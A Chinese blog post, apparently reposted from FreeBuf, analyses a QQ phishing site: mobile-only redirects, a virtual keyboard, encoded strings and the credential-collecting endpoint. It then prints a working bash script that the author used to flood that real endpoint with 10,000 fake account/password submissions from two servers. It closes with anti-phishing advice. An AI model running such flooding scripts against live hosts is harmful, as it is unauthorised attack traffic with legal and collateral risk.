對一次釣魚事件的分析

程序員的成長之路

互聯網/程序員/技術/資料共享 

閱讀本文大概需要 4.5 分鐘。

來自：FreeBuf.COM，作者：一個神祕的人

鏈接：https://www.freebuf.com/articles/network/230406.html

本文是對一次釣魚事件的分析，在下水平實在不高，請路過的高手勿噴。像網絡釣魚這種違法事件時不時地出現在我們身邊，下面是本人的親身經歷。

昨天在刷空間時看到同學發了這麼一條消息，留言？

打開看看，嗯，不對啊，我倆18年6月加的好友啊，這是什麼情況？

帶着滿腦子問號，掃碼進去，瞬間就警惕了。

先瞎輸一氣，發現我的輸入法不對勁啊，我用的訊飛輸入法不長這樣啊？

結果進去了？！跳轉到QQ空間手機網頁版。難不成是釣魚？複製用瀏覽器打開，發現域名不對，果然是釣魚。

用電腦打開看看

百度？302重定向，emmm……摁F12看看，分析一下響應日誌，果然有發現

從這裏不難發現我們現在訪問的網址只不過是一個轉發腳本，真正的頁面是紅線畫的，302重定向就是他發出的。訪問一下看看，同樣也是被重定向到百度。

手機訪問直接進入釣魚頁面

明白了，網頁寫了判斷，如果是手機就正常訪問，如果是電腦就跳轉到百度。用chrome模擬移動設備訪問。

成功訪問，但是我發現鍵盤使不了了，密碼框輸不進去，禁用鍵盤，彈出了一個虛擬鍵盤讓你輸入賬號密碼。

可以肯定這是爲手機而量身定做的釣魚網站。從代碼中可以看出，紅線部分的“u”表示QQ號碼，“p”表示密碼。黑線框起來的部分是生成虛擬鍵盤的代碼，太長，就展開了一段。

這段是跳轉url，應該是用來提交信息的。

啊，一大串的字符串，看樣子是BASE64加密的，BASE64在線解密https://www.bejson.com/enc/base64/

看樣子這是層unicode，還要轉換一下，轉換之前需要把所有“%”號替換成“\”號。在線unicode轉中文https://www.bejson.com/convert/unicode_chinese/

文字顯示出來了

如法炮製，解密所有字符串

沒什麼可利用的東西。

隨便輸個賬號密碼，發現先是訪問了一個php頁面然後跳轉到H5QQ空間。這個dnf.php就應該是用來提交信息的。

查一下域名，竟然是企業辦的。但是www打不開。反查下whois，結果我驚了，這個人名下的域名有十萬多個….站長之家http://tool.chinaz.com/

ping一下，再查詢一下IP信息，確定沒有CDN。

直接訪問IP，好熟悉的一幕，這不是寶塔嗎？

訪問默認8888端口試試，確實是寶塔，但是沒有安全入口和賬號密碼什麼的，就我這水平，搞他是不可能的。22端口開放了，ssh爆破希望渺茫，888端口雖然開放但是找不到phpmyadmin，php mysql注入判斷還被攔截……

突然想起他的提交頁面，呵呵，搞不死他也得搞殘他，必須得搞搞他！打開xshell，連接了我的雲服務器，vim寫了一個腳本，

代碼如下

#!/bin/bash
i=1  #定義變量
until ((i>10000))  #讓腳本連續執行10000次
do  #開始循環
    function rand(){
        min=$1
        max=$(($2-$min+1))
        num=$(($RANDOM+1000000000))
        echo $(($num%$max+$min))
                   }  #生成長度爲十位的隨機數
        name=$(rand 1000000000 9999999999)  #定義QQ賬號，1000000000-999999999的隨機數
        pwd=$(head -c 9 /dev/random | base64)  #定義密碼，12位的隨機字符串
        curl -v 'https://cdn.tldcnm.com/dnf.php?u='$name'&p='$pwd'' \  #提交post請求，發送虛假賬號密碼信息，好好填充一下他的數據庫，並在執行時輸出實時信息
          -H 'authority: cdn.tldcnm.com' \
          -H 'upgrade-insecure-requests: 1' \
          -H 'user-agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.43 Mobile Safari/537.36' \  #這裏我們模擬成移動終端設備，否則可能提交不成功
          -H 'accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \
          -H 'sec-fetch-site: same-origin' \
          -H 'sec-fetch-mode: navigate' \
          -H 'sec-fetch-user: ?1' \
          -H 'sec-fetch-dest: document' \
          -H 'referer: https://cdn.tldcnm.com/' \
          -H 'accept-language: zh-CN,zh;q=0.9' \
          -H 'cookie: PHPSESSID=cddh7cie2m1a8lmcqch2avtf37' \
          --compressed
        sync
        echo 3 > /proc/sys/vm/drop_caches  #清理緩存，節省空間
done  #循環結束

bash測試一下，看到輸出信息，post提交成功並且連續提交10000次。

由於腳本發起的post請求跟正常訪問頁面一樣，不屬於DDOS，寶塔和防火牆不會攔截，返回302則表明提交成功（提交成功後會被重定向，所以返回302）。爲了提高效率我用兩臺服務器多線程一起跑，估計數據庫裏找到真實的賬號密碼得費老勁了，全被無用的虛假數據淹沒了。

問了一下朋友關於這張釣魚二維碼圖片的事，他表示並不知情，很有可能中病毒了。同時也告訴了其他掃過這個碼的人，通知他們及時地修改密碼，保證自己的隱私和財產安全！

最後總結一下防釣經驗：只要是讓你輸入賬號密碼，就要考慮是不是釣魚網站，儘可能使用一鍵登錄或者掃碼登陸避免密碼泄漏的風險。

訪問時看看網址域名，如果不是QQ官方域名而且沒有快捷、一鍵登錄選項那絕大多數都是釣魚的。

本人已經將此信息提交到360舉報平臺，阻止更多的人上當受騙。希望每一個被釣魚的朋友都把釣魚網站舉報，讓360，騰訊等安全平臺及時提醒並攔截正在訪問釣魚頁面的人，防止更多的人上當受騙！

淨化網絡環境，維護互聯網安全，從我們每一個人做起！

<END>

推薦閱讀：

Spring Boot 2.3.0 正式發佈！

程序員面試 10 大潛規則，千萬不要踩坑！

5T技術資源大放送！包括但不限於：C/C++，Linux，Python，Java，PHP，人工智能，單片機，樹莓派，等等。在公衆號內回覆「2048」，即可免費獲取！！

微信掃描二維碼，關注我的公衆號

寫留言

朕已閱